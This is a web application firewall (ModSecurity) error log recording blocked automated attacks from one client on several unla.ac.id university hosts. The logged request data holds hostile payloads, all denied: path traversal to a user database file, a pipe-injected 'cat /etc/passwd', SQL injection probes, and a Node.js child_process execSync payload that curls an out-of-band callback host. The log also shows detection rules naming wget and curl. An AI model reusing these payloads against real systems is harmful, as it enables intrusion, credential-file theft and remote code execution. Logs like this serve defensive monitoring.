[Tue Aug 29 11:33:20.357897 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARTENsAAAAG"]
[Tue Aug 29 11:33:20.359825 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11EMCo-f0AAARu2q0AAAAW"]
[Tue Aug 29 11:33:20.375494 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARA7fkAAAAA"]
[Tue Aug 29 11:33:21.305420 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARfwj0AAAAI"]
[Tue Aug 29 11:33:21.311783 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARiDlkAAAAJ"]
[Tue Aug 29 11:33:21.311946 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARpgxkAAAAU"]
[Tue Aug 29 11:33:21.318073 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARR29IAAAAF"]
[Tue Aug 29 11:33:21.320255 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EcCo-f0AAANsAeMAAAAD"]
[Tue Aug 29 11:33:21.332520 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgie7y6364j1p1q.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EcCo-f0AAARA7fwAAAAA"]
[Tue Aug 29 11:33:21.339807 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARu2rEAAAAW"]
[Tue Aug 29 11:33:22.300623 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgfwgptow9xoadt.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARfwkEAAAAI"]
[Tue Aug 29 11:33:22.304727 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgtg7ea7mjr5n4y.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARNk@AAAAAS"]
[Tue Aug 29 11:33:22.327022 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgd6y6ophzberrn.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARiDlwAAAAJ"]
[Tue Aug 29 11:33:22.391302 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgqjzdycdjz8xhn.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARpgx8AAAAU"]
[Tue Aug 29 11:33:22.421158 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgj4e5fm73f11xt.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARNk@UAAAAS"]
[Tue Aug 29 11:33:22.429062 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARiDmAAAAAJ"]
[Tue Aug 29 11:33:22.432744 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARpgyEAAAAU"]
[Tue Aug 29 11:33:22.436609 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARR29kAAAAF"]
[Tue Aug 29 11:33:22.442332 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11EsCo-f0AAARNk@YAAAAS"]
[Tue Aug 29 11:33:23.301671 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARv7QAAAAAY"]
[Tue Aug 29 11:33:23.358234 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARjjLoAAAAL"]
[Tue Aug 29 11:33:23.359259 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARwusAAAAAZ"]
[Tue Aug 29 11:33:23.359706 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARpgyYAAAAU"]
[Tue Aug 29 11:33:23.382751 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARnmJEAAAAR"]
[Tue Aug 29 11:33:24.307700 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARiDmcAAAAJ"]
[Tue Aug 29 11:33:24.332626 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARjjL0AAAAL"]
[Tue Aug 29 11:33:24.335904 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARnmJMAAAAR"]
[Tue Aug 29 11:33:24.336179 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARpgykAAAAU"]
